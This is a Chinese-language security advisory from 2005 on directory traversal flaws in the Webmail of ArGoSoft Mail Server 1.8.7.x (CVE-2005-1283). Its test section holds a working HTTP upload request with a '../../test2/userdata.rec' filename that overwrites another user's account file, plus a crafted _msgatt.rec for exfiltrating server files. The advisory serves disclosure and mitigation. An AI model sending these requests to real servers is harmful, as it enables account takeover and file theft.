发布日期：2005-04-25
更新日期：2005-04-25

受影响系统：

ArGoSoft Mail Server Pro 1.8.7.6

描述：

---

BUGTRAQ  ID: 12502
CVE(CAN) ID: CVE-2005-1283

ArGoSoft Mail Server是一款Windows 95/98/NT/2000平台下的SMTP/POP3/Finger邮件服务器，其专业版还支持IMAP模块。

Argosoft Mail Server 1.8.7.6修复了多个重要漏洞，但SIG^2发现Argosoft Mail Server 1.8.7.3中仍存在一些目录遍历漏洞，厂商的最新版产品（Argosoft Mail Server 1.8.7.6）没有修复这些漏洞。

1. 邮件附件文件名中的目录遍历漏洞允许向任意目录上传文件

ArGoSoft Mail Server的Webmail允许登陆用户在创建邮件时上传文件附件。由于对用户提供的文件名缺少输入过滤，用户可以向服务器的任意位置上传文件。

2. _msgatt.rec中的目录遍历漏洞允许以附件发送服务器上的任意文件

当Webmail用户在创建邮件时，所有上传的附件都会存储在以下临时目录中：

C:\Program Files\ArGo Software Design\Mail Server\_users\_nodomain\username\_tempatt\

服务器会在这个临时文件夹中创建_msgatt.rec文件保存所有用户上传文件附件的文件名。用户可以上传包含有目录遍历字符的特制_msgatt.rec文件导致服务器以附件向用户发送服务器上的任意文件。

<*来源：Tan Chew Keong （chewkeong@security.org.sg）
        ShineShadow （ss_contacts@hotmail.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=111419001527077&w=2
        http://www.security.org.sg/vuln/argosoftmail1873.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

1 文件上传漏洞

POST /attachfile HTTP/1.0
Host: localhost
Cookie: ams-auth=XXXXXXXXXXXXX
Content-Type: multipart/form-data; boundary=---------------------------24242261923581
Content-Length: 456
Connection: Close

-----------------------------24242261923581
Content-Disposition: form-data; name="x"

52
-----------------------------24242261923581
Content-Disposition: form-data; name="y"

10
-----------------------------24242261923581
Content-Disposition: form-data; name="attfile"; filename="../../test2/userdata.rec"
Content-Type: application/octet-stream

__VER__1.8.7.3
XXXXXXXX
test2

test2
0
1
0

-----------------------------24242261923581--

2 _msgatt.rec文件漏洞

../../test2/userdata.rec

如果以附件上传这个恶意文件并保存到临时目录中的话：

../../test2/userdata.rec
-
_msgatt.rec

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 禁用 Argosoft Mail Server的WebMail

厂商补丁：

ArGoSoft
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.argosoft.com/applications/mailserver/

浏览次数：3294
严重程度：0（网友投票）